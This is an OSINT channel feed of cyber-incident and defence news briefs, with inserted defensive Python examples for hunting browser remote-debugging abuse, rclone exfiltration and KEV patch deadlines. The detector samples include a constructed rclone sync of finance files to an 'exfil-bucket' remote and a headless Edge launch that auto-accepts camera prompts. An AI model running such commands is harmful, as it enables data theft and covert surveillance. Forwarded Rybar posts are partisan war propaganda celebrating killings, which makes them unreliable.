SITREP - Independent OSINT Channel
23.9K subscribers
AI, technology, mass surveillance, and intelligence — everything you need to know about tomorrow.
🔍 Chrome Zero-Days Patched Under Fire

Google has issued an emergency Chrome update addressing two zero-day vulnerabilities — one in the Skia graphics library and one in the V8 JavaScript engine — both confirmed as actively exploited at time of release. The patch brings Chrome's total actively exploited vulnerabilities in 2026 to three.

Two actively exploited bugs in distinct subsystems landing in one release suggests parallel exploitation activity rather than a single discovery. The two roles are complementary: a V8 bug typically gives an attacker code execution inside the sandboxed renderer process, the first link of a chain that still needs a separate sandbox-escape bug to reach the host; a Skia bug gives memory corruption in the rendering path, reachable from attacker-controlled page content.

🛰️ Open sources - closed narratives
@sitreports
Forwarded from Rybar in English
📝Heavy drones needed more than tanks📝
On resource reallocation in the SMO

When officials hear military needs, they argue about finite budgets. They say we need everything, but the budget is not unlimited.

But what about optimal resource reallocation?
On TAKTIKAR, we showed why mechanized assaults have stopped working. Why not buy fewer armored vehicles that survive one attack in favor of heavy FPV drones?

For one BMD-4M, you can buy over 1,100 unmanned systems. Refusing to purchase a battalion of these vehicles or tanks (not counting ammunition) could free up significant funds.

📌 Assault troops need "Upyr-18" drones capable of delivering mines, not BMDs with "cardboard" armor.
The priority is destroying AFU personnel with drone crews, which heavy FPV drones handle better than APCs, IFVs, and tanks.

❗️This doesn't mean armored vehicles should be "canceled." It's about rational resource reallocation to changing battlefield realities.

Without infantry support, it dies, and there's no one left to attack (or defend). And without people, tank numbers don't matter.

📍High-resolution infographic

📍English version

#UAV #Russia
🔍 DRILLAPP Backdoor Targets Ukraine

A JavaScript backdoor designated DRILLAPP was deployed against Ukrainian targets in February 2026, abusing Microsoft Edge remote debugging features to conduct covert surveillance. The implant capabilities include camera access, microphone capture, and screen recording.

Driving the browser through its own remote-debugging interface (the DevTools protocol) means the capture is performed by a signed, trusted Edge process rather than by a standalone implant binary, which shrinks what endpoint detection has to look at. This is abuse of a legitimate feature, not exploitation of a browser bug: the attacker has to launch or relaunch Edge with debugging enabled, and that launch is where process command lines and DevTools artifacts give defenders something to hunt. The technique places DRILLAPP within a documented pattern of browser-native tradecraft used in long-term espionage operations against Ukrainian infrastructure.
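The two artifacts that launch leaves behind, as an added hunting example (not DRILLAPP code, and not from the SITREP post): the Chromium launch switches that expose or weaken the DevTools boundary, and the DevToolsActivePort file Chromium writes into the profile root whenever remote debugging is on. Field names (Image, ParentImage, CommandLine) follow Sysmon process-creation events and are an assumption; the sample events are constructed; the media-stream switch is included as something such an implant might add, not something the post attributes to DRILLAPP.

```python
"""Added example: hunt for Edge/Chrome launched with remote debugging enabled."""
import os
import re
import tempfile

# Chromium launch switches that expose the DevTools protocol or remove the prompts a
# remotely driven browser would otherwise trigger. The first three matter most for
# DRILLAPP-style control; --use-fake-ui-for-media-stream is an assumption about what an
# implant wanting camera/microphone access might add (it auto-accepts media prompts).
DEBUG_SWITCHES = {
    "--remote-debugging-port": "DevTools protocol listening on a TCP port",
    "--remote-debugging-pipe": "DevTools protocol over inherited pipes (no port to see)",
    "--remote-allow-origins": "DevTools websocket accepts connections from other origins",
    "--headless": "no visible window for the victim to notice",
    "--use-fake-ui-for-media-stream": "camera/microphone permission prompts auto-accepted",
}
BROWSERS = {"msedge.exe", "chrome.exe", "brave.exe", "chromium.exe"}
USER_LAUNCHERS = {"explorer.exe"}   # assumption: the normal parent on a workstation
SWITCH_RE = re.compile(r'(--[\w-]+)(?:=("[^"]*"|\S+))?')
TEMP_PROFILE_RE = re.compile(r"\\temp\\|\\programdata\\", re.I)

def basename(path):
    return os.path.basename(path.replace("\\", "/")).lower()

def parse_switches(cmdline):
    """Map each Chromium-style --switch[=value] on the command line to its value (or None)."""
    return {m.group(1): (m.group(2) or "").strip('"') or None
            for m in SWITCH_RE.finditer(cmdline)}

def assess(event):
    """Score one process-creation record: 2 per debugging switch, +1 for an odd parent,
    +1 for a throwaway profile directory. Returns (score, reasons)."""
    if basename(event.get("Image", "")) not in BROWSERS:
        return 0, []
    switches = parse_switches(event.get("CommandLine", ""))
    reasons = [f"{s}: {DEBUG_SWITCHES[s]}" for s in switches if s in DEBUG_SWITCHES]
    if not reasons:
        return 0, []
    score = 2 * len(reasons)
    parent = basename(event.get("ParentImage", ""))
    if parent not in USER_LAUNCHERS:
        reasons.append(f"parent is {parent or 'unknown'}, not the user's shell")
        score += 1
    profile = switches.get("--user-data-dir")
    if profile and TEMP_PROFILE_RE.search(profile):
        reasons.append(f"throwaway profile under {profile}")
        score += 1
    return score, reasons

def hunt(events, threshold=4):
    """Return (event, score, reasons) for every record at or above the threshold."""
    scored = [(ev, *assess(ev)) for ev in events]
    return [row for row in scored if row[1] >= threshold]

def find_devtools_ports(root):
    """Chromium writes DevToolsActivePort into the profile root when remote debugging
    is on: line 1 is the port, line 2 the browser websocket path. Finding the file in a
    profile tells you debugging was enabled for that profile."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if "DevToolsActivePort" in files:
            path = os.path.join(dirpath, "DevToolsActivePort")
            with open(path, encoding="utf-8") as fh:
                lines = fh.read().splitlines()
            hits.append({"file": path,
                         "port": int(lines[0]) if lines and lines[0].isdigit() else None,
                         "ws_path": lines[1] if len(lines) > 1 else None})
    return hits

def demo_profile_scan():
    """Create a temporary profile containing a constructed DevToolsActivePort and scan it."""
    root = tempfile.mkdtemp(prefix="edgeprof-")
    os.makedirs(os.path.join(root, "Default"))
    with open(os.path.join(root, "DevToolsActivePort"), "w", encoding="utf-8") as fh:
        fh.write("9222\n/devtools/browser/0f1e2d3c-constructed\n")
    return find_devtools_ports(root)

SAMPLE_EVENTS = [  # constructed telemetry, not real DRILLAPP observations
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default'},
    {"Image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --headless=new --remote-debugging-port=9222 --remote-allow-origins=* --use-fake-ui-for-media-stream --user-data-dir="C:\Users\u\AppData\Local\Temp\edgeprof"'},
]

if __name__ == "__main__":
    for _ev, score, reasons in hunt(SAMPLE_EVENTS):
        print(score, *reasons, sep="\n  ")
    print(demo_profile_scan())
```

A user-launched Edge with only --profile-directory scores 0; the second record scores 10 (four debugging switches, a script-host parent, a profile under Temp). Run the profile walk over the real Edge and Chrome user-data roots, not the temporary directory the demo creates.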

Forwarded from Rybar in English
📝One strongpoint — one drone📝

Infantry's dream on the front line is the ability to destroy an enemy strongpoint with a single hit. Whereas previously this required sending an assault trooper to throw a TM-62 mine by hand, now there is an alternative.

Just look at this footage of heavy FPV drones "Upyr-18" in action, killing everything alive in Ukrainian bunkers on the first hit. This is exactly what we talked about in the corresponding video on TAKTIKAR.

Yes, you can try to destroy a strongpoint with lighter drones, but due to smaller warhead power you'll have to spend dozens of unmanned vehicles, which will cost many times more. So economics alone speaks in favor of heavy FPV-drones for such tasks.

📌 That said, this doesn't mean this class of equipment "cancels out" all other FPV drones; it simply makes it possible to use different equipment for the tasks suited to it. Vehicles, for their part, will continue to be destroyed using "Prince Vandal Novgorodsky" and similar systems.

And the more working tools operators have, the more effectively they can accomplish tasks and eliminate AFU manpower, severely depleting the enemy's irreplaceable resource. Because without this there will be no advance.

#UAV #Russia #Ukraine

🔍 Handala Deploys Wipers via NetBird

Handala Hack, an Iranian state-sponsored group linked to the Ministry of Intelligence and Security, has escalated destructive cyber operations using RDP access and the NetBird mesh networking tool to deploy wiper payloads against international targets.

The use of NetBird, a legitimate WireGuard-based peer-to-peer connectivity framework, indicates a shift toward living-off-the-land tooling: command traffic rides an encrypted mesh VPN that looks like any other authorized remote-access session, which obscures the command infrastructure behind it. RDP with valid credentials serves as the initial access vector, so no custom implant is needed to get in; the wiper only appears once access is already established.

The operational pattern fits a documented MOIS-aligned posture prioritizing data destruction over exfiltration, consistent with Handala's previous campaigns targeting Israeli and Western-affiliated organizations.

🔍 Stryker Confirms Wiper Attack, Thousands Erased

Medical device manufacturer Stryker confirmed a wiper attack beginning March 11, 2026, that destroyed data across thousands of corporate devices. The incident disrupted internal Microsoft services, manufacturing workflows, and shipping operations.

Wiper deployments against manufacturing infrastructure indicate an intent to degrade operational continuity rather than extract data. Targeting both IT systems and logistics simultaneously suggests the attack was scoped to maximize recovery time across interdependent production chains.

🔍 CamelClone Campaign Targets Government Networks

Seqrite Labs has identified an espionage operation designated Operation CamelClone, directed at government entities and critical infrastructure. The campaign employs Rclone tooling alongside public hosting platforms to stage and exfiltrate data, reducing infrastructure costs and complicating attribution by leveraging legitimate services.

The use of Rclone for exfiltration follows an established pattern among state-aligned threat actors seeking to blend malicious transfers with routine cloud traffic. Routing data through public hosting sites further obscures collection activity from network-layer detection, a technique observed across multiple documented espionage clusters targeting public sector networks.
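Rclone blends in at the network layer, but its command line has a distinctive grammar: a verb such as copy, sync or move, a local source, and a destination written as `name:path` (a configured remote) or `:backend:path` (an on-the-fly remote). The added example below, which is not Seqrite's detection logic or anything from the post, parses that grammar from process command lines so it still fires when the binary has been renamed, and it handles the one edge case that otherwise floods the rule: a Windows drive letter also contains a colon. Sample command lines are constructed; the flag lists are rclone options the author of this example knows exist, not a claim about what CamelClone used.

```python
"""Added example: spot rclone-style uploads from process command lines."""
import os
import re

RCLONE_VERBS = {"copy", "copyto", "sync", "move", "moveto", "ls", "lsd", "lsf",
                "lsjson", "config", "mount", "serve", "rcd"}
# "name:path" (configured remote) or ":backend:path" (on-the-fly remote)
REMOTE_RE = re.compile(r"^:?[A-Za-z0-9_.-]+:")
# a Windows drive ("C:\data") also matches REMOTE_RE and must be excluded
DRIVE_RE = re.compile(r"^[A-Za-z]:[\\/]")
# flags that consume the following token, so that token is not read as a path
VALUE_FLAGS = {"--config", "--transfers", "--bwlimit", "--max-age", "--min-size",
               "--max-size", "--log-file", "--filter-from", "--include", "--exclude"}
# flags worth surfacing to an analyst: custom config, TLS checks off, throttling, quiet
INTEREST_FLAGS = {"--config", "--no-check-certificate", "--bwlimit", "--transfers",
                  "--ignore-existing", "-q", "--quiet", "--log-file"}
TOKEN_RE = re.compile(r'"[^"]*"|\S+')

def is_remote(arg):
    if arg.startswith(("http://", "https://")):
        return False
    return bool(REMOTE_RE.match(arg)) and not DRIVE_RE.match(arg)

def analyze(cmdline):
    """Return a finding dict if the command line reads as an rclone transfer to a
    remote, else None. Works on the grammar, so a renamed binary still matches."""
    argv = [t.strip('"') for t in TOKEN_RE.findall(cmdline)]
    if not argv:
        return None
    binary = os.path.basename(argv[0].replace("\\", "/")).lower()
    flags, positional, i = {}, [], 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-"):
            name, _, val = tok.partition("=")
            if not val and name in VALUE_FLAGS and i + 1 < len(argv):
                val, i = argv[i + 1], i + 1
            flags[name] = val or None
        else:
            positional.append(tok)
        i += 1
    verb = positional[0].lower() if positional else None
    if verb not in RCLONE_VERBS:
        return None
    remotes = [p for p in positional[1:] if is_remote(p)]
    if not remotes:
        return None                      # local-to-local: a backup job, not an upload
    return {
        "binary": binary,
        "renamed": binary not in ("rclone.exe", "rclone"),
        "verb": verb,
        "remotes": remotes,
        "local_paths": [p for p in positional[1:] if not is_remote(p)],
        "config": flags.get("--config"),
        "interest_flags": sorted(f for f in flags if f in INTEREST_FLAGS),
    }

def hunt(cmdlines):
    return [r for r in (analyze(c) for c in cmdlines) if r]

SAMPLE_CMDLINES = [  # constructed, not observed CamelClone commands
    r'rclone.exe copy C:\Users\a\Documents gdrive:staging --transfers 8 -q',
    r'C:\ProgramData\svchost.exe sync "C:\Finance\Q1 reports" :s3:exfil-bucket/q1 --config C:\ProgramData\r.conf --no-check-certificate',
    r'rclone.exe copy C:\data D:\backup --transfers 4',
    r'robocopy.exe C:\src \\nas\share /MIR',
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_CMDLINES):
        print(finding)
```

The second sample is the interesting one: the binary is named svchost.exe and sits in ProgramData, the config file is non-default, TLS verification is off, and the destination is an on-the-fly S3 remote. The third sample, a local drive-to-drive copy, produces nothing, which is the point of the drive-letter check.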

🔍 CISA Adds Wing FTP to KEV

CISA has added CVE-2025-47813 to its Known Exploited Vulnerabilities catalog following confirmed active exploitation of a flaw in Wing FTP Server that exposes internal server paths, providing attackers with reconnaissance data usable in follow-on operations.

The path disclosure class of vulnerability is routinely leveraged to map server infrastructure prior to lateral movement or privilege escalation. CISA has set a remediation deadline of March 30, 2026 for federal agencies under BOD 22-01 obligations.
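A KEV addition is only useful if it reaches the teams holding the affected assets with its due date attached. The added example below (not CISA's tooling, not from the post) cross-references scanner findings against a catalog in the shape of CISA's known_exploited_vulnerabilities.json feed and buckets each hit by days remaining. The catalog excerpt is constructed: the Wing FTP due date is the one the post cites, the vendor and product strings are placeholders, and the second row is an older catalog entry included so the overdue branch has something to act on (verify its date against the live feed). The scanner output and its placeholder CVE id are constructed too.

```python
"""Added example: triage scanner findings against a KEV-format catalog."""
import json
from datetime import date

KEV_URL = "https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json"

# Constructed excerpt in the feed's shape; only the fields used below are kept.
KEV_JSON = """{
  "title": "constructed KEV excerpt",
  "vulnerabilities": [
    {"cveID": "CVE-2025-47813", "vendorProject": "Wing FTP", "product": "Wing FTP Server",
     "dueDate": "2026-03-30"},
    {"cveID": "CVE-2021-44228", "vendorProject": "Apache", "product": "Log4j2",
     "dueDate": "2021-12-24"}
  ]
}"""

# Constructed scanner output: host plus the CVE ids it was flagged for.
# CVE-0000-00000 is a placeholder for "something not in the catalog".
SCAN_FINDINGS = [
    {"host": "ftp-dmz-01", "cves": ["CVE-2025-47813", "CVE-0000-00000"]},
    {"host": "app-legacy-03", "cves": ["CVE-2021-44228"]},
]

def load_kev(text):
    """Index a KEV-shaped JSON document by CVE id."""
    return {v["cveID"]: v for v in json.loads(text)["vulnerabilities"]}

def load_live_kev(url=KEV_URL, timeout=10):
    """Fetch the real catalog (needs network); same shape as KEV_JSON."""
    import urllib.request
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return load_kev(resp.read().decode("utf-8"))

def triage(kev, findings, today, soon_days=14):
    """One row per (host, CVE) that is in the catalog, sorted so the most overdue
    item comes first. CVEs absent from the catalog fall under the normal patch SLA
    rather than BOD 22-01 and are skipped here."""
    rows = []
    for finding in findings:
        for cve in finding["cves"]:
            entry = kev.get(cve)
            if entry is None:
                continue
            due = date.fromisoformat(entry["dueDate"])
            days_left = (due - today).days
            if days_left < 0:
                status = "overdue"
            elif days_left <= soon_days:
                status = "due_soon"
            else:
                status = "scheduled"
            rows.append({"host": finding["host"], "cve": cve,
                         "product": entry["product"], "due": entry["dueDate"],
                         "days_left": days_left, "status": status})
    rows.sort(key=lambda r: r["days_left"])
    return rows

if __name__ == "__main__":
    for row in triage(load_kev(KEV_JSON), SCAN_FINDINGS, date.today()):
        print(row)
```

Pass a fixed `today` when you want reproducible output (the test does); in production, swap `load_kev(KEV_JSON)` for `load_live_kev()` and feed it your scanner's export. BOD 22-01 binds federal agencies, but the due date is a reasonable default SLA for anyone else exposing the same product.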

🔫 Federal Agencies Test Counter-Drone Laser

Multiple federal agencies conducted a joint test of a classified directed-energy weapon at White Sands Missile Range, New Mexico. The laser test targeted counter-drone applications, placing it within an accelerating U.S. effort to field non-kinetic intercept capability against unmanned aerial systems.

The multi-agency format indicates the program crosses organizational boundaries — likely spanning defense, homeland security, and intelligence equities. Directed-energy testing at White Sands follows an established pattern of low-visibility evaluation before transition to operational deployment.

🔍 Iran War Drives 245% Cybercrime Surge

Since the outbreak of the Iran war, cybercrime activity has risen 245%, according to recent reporting. Hacktivist groups have been routing operations through abuse-oriented proxy infrastructure based in Russia and China, which has generated billions of connection attempts.

The pattern fits an established operational model: conflict events function as force multipliers for hacktivist mobilization, with anonymizing proxy networks providing plausible deniability and scalability. Routing through Russian and Chinese infrastructure complicates attribution and raises the threshold for any formal state-level response.

🔍 GlassWorm Targets Python Supply Chain

A campaign designated GlassWorm has been injecting malware into GitHub-hosted Python repositories via stolen authentication tokens since March 8, 2026. The method relies on force-pushed commits, allowing attackers to overwrite repository history without triggering standard pull-request review processes.

The GlassWorm campaign fits an established pattern of software supply-chain compromise in which upstream code repositories are used as distribution vectors rather than targeting end users directly. A stolen token is a valid credential, so the push passes authentication and looks like the maintainer's own activity; what it sidesteps is the web login's MFA and the pull-request review a normal merge would go through, and a force-push then rewrites history instead of adding to it. Repository owners see little beyond a commit under their own name, which is why the practical controls are branch rules that block force-pushes and short-lived, narrowly scoped tokens.

🔍 LUCAS Drone Stockpile: Combat Debut

The Pentagon's LUCAS drone inventory stands in the dozens as the system enters combat deployment with U.S. Central Command. Pentagon CTO Emil Michael stated that full-rate production has not been reached, and available units were shipped as-is to theater.

The deployment reflects a pattern common to accelerated defense acquisition cycles: operational introduction precedes production scale-up. Fielding low-inventory systems into active commands functions as a live validation phase, with production ramp contingent on battlefield performance data.

🏦 Bank Builds Internal AI Threat Agent

Commonwealth Bank developed an in-house AI threat hunting agent after determining that third-party vendors could not match the tempo of emerging threats. The decision reflects a structural shift in enterprise security architecture — proprietary tooling replacing or supplementing commercial solutions where detection velocity is the primary operational requirement.

Following deployment, weekly threat signal volume increased from 80 million to 400 billion, while mean response time dropped from two days to 30 minutes. The threat agent build represents a direct acknowledgment that AI-generated attack surface expansion requires AI-native defense infrastructure operating at matching scale.

🔍 Golden Dome Budget Hits $185B

The projected cost of the U.S. Defense Department's Golden Dome homeland missile defense architecture has risen to approximately $185 billion, a $10 billion increase attributed to the expansion of space-based components. The revision was disclosed by the program's director.

The cost growth follows a structural pattern common to layered missile defense programs: space-based sensor and intercept layers carry disproportionate integration costs and extend procurement timelines. The $10 billion addition reflects prioritization of orbital infrastructure over ground-based redundancy in the current architecture.

🤿 Exail Underwater Drone Orders Surge

French defense technology firm Exail Technologies reported an 87% increase in order intake for the full year, reaching 844 million euros. Core profit rose 40% to 103 million euros. The growth is attributed primarily to demand for underwater drone systems.

The figures indicate accelerating procurement of unmanned underwater vehicles across Exail's customer base. The scale of order intake relative to profit margin suggests a pipeline extending multiple years forward, consistent with defense acquisition cycles rather than commercial spot demand.

🔍 EU Sanctions Chinese, Iranian Cyber Actors

The European Union has imposed sanctions on Chinese and Iranian firms and individuals linked to cyberattacks targeting critical infrastructure across EU member states. The designated actors are attributed to operations affecting over 65,000 devices within the bloc.

The designations follow an established EU pattern of using the cyber sanctions regime as a signaling instrument against state-proximate threat actors. Targeting both Chinese and Iranian entities in a single package indicates coordinated attribution across two distinct threat clusters rather than a response to a single incident.

🔍 Iran Targets Medical Tech Firm

Iranian threat actors conducted a cyberattack against Stryker, a US-based medical technology company, according to reporting on the incident. The operation is assessed as part of Iran's sustained use of offensive cyber capability as an asymmetric instrument, compensating for conventional force limitations in air and naval domains.

The targeting of a medical device manufacturer fits a documented pattern of Iranian cyber operations against US critical infrastructure and dual-use industrial sectors. Stryker produces equipment used across both civilian hospitals and military medical supply chains, giving the target strategic relevance beyond commercial disruption.

🔍 Japan Authorizes Offensive Cyber Operations

From October 1st, Japan's government will permit proactive cyber-defense operations — a doctrine authorizing intrusion into adversary networks before an attack occurs. Per legislative review, the policy shift moves Japan from a strictly defensive posture to one permitting preemptive network operations, functionally equivalent to what other states classify as offensive cyber capability.

The change marks a structural departure from Japan's postwar security constraints. Operationally, proactive cyber-defense grants state actors authority to conduct reconnaissance and interdiction inside foreign infrastructure, a capability that allies such as U.S. Cyber Command and the UK's National Cyber Force already exercise and that Japan has until now lacked.

🔍 U.S. Agencies Build Central Surveillance Database

Multiple federal agencies are pooling immigration records, Social Security numbers, and additional personal data into a centralized government database, according to reported disclosures. The Freedom of the Press Foundation has filed suit to determine the full scope of data aggregation underway.

Centralized identity repositories of this structure reduce inter-agency friction in population tracking and expand query capability across previously siloed datasets. The litigation targets procedural transparency, not the database's operational status.

🔍 GlassWorm Returns, Hits 400 Repos

The GlassWorm supply-chain campaign has re-emerged with a coordinated operation targeting over 400 packages, repositories, and extensions across GitHub, npm, the VS Code Marketplace, and Open VSX.

The simultaneous reach across four distinct platforms indicates deliberate multi-vector targeting rather than opportunistic infection. Compromising IDE extensions alongside package registries expands the attack surface to development environments directly, not only downstream dependencies.

This pattern fits an established model of supply-chain infiltration where developer tooling is treated as an insertion point into build pipelines. Repeated deployment of the same campaign suggests persistent infrastructure behind GlassWorm rather than isolated actors.

🔍 Iran Cyber-EW Operations Converge

Following a joint US-Israeli military operation initiated on February 28, 2026, Iran-linked actors began integrating cyber operations with electronic warfare capabilities as regional conflict escalated.

The convergence of cyber and EW domains marks a structural shift in Iranian operational doctrine — moving from parallel-track disruption toward synchronized, multi-domain degradation of adversary communications, navigation, and command infrastructure.
